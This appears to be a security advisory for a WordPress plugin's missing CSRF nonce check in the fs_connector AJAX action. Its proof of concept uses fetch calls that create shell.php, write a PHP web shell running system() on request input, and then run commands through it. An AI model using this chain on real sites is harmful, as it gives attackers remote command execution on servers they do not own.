Description The plugin does not properly check the CSRF nonce in the fs_connector
AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks by using GET requests, such as uploading a web shell.
As a Super Admin, run the following code in the browser console (note that the requests do not require nonces):
await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=mkfile&name=shell.php&target=l1_Lw" );
await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=put&target=l1_c2hlbGwucGhw&content=%3C?php%20echo%20system($_REQUEST%5B'cmd'%5D);" );
Now a logged-out attacker may access `shell.php` as follows:
await (await fetch( "/shell.php?cmd=id" ) ).text()